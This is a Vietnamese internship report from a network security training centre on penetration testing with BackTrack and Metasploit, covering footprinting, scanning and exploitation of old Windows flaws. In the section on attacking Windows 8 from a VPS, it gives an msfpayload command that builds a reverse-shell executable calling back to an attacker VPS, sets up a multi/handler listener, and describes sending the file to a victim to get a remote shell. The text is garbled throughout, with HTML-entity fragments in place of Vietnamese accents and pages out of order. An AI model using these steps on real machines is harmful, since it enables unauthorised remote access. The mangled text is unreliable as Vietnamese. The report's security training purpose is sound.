Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
v
MỤC LỤC
LỜI CAacuteM ƠN ii
NHẬN XEacuteT THỰC TẬP iii
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN iv
LỜI MỞ ĐẦU vii
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN MẠNG 1
11 GIỚI THIỆU VỀ COcircNG TY 1
12 LỊCH SỬ HIgraveNH THAgraveNH 1
13 QUAacute TRIgraveNH PHAacuteT TRIỂN 2
14 CHỨC NĂNG VAgrave NHIỆM VỤ 3
15 CƠ CẤU TỔ CHỨC 3
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH 3
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP 4
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG 5
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN 5
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN 5
221 TỔNG QUAN VỀ BACKTRACK 5
2211 GIỚI THIỆU BACKTRACK 5
2212 LỊCH SỬ PHAacuteT TRIỂN 6
2213 MỤC ĐIacuteCH 6
222 FOOTPRINTING 7
223 CAacuteC KIỂU FOOTPRINTING 8
2231 PASSIVE FOOTPRINTING 8
2232 ACTIVE FOOTPRING 13
224 SCANING 13
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH 14
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING 14
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG 20
2251 LỖI MS08_067 20
2252 LỖI MS10_090 26
2253 LỖI MS12_004 34
2254 LỖI MS12_027 43
vi
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET 52
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ VPS 59
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS 65
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute 69
31 ƯU ĐIỂM 69
32 KHUYẾT ĐIỂM 69
33 KẾT LUẬN 69
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
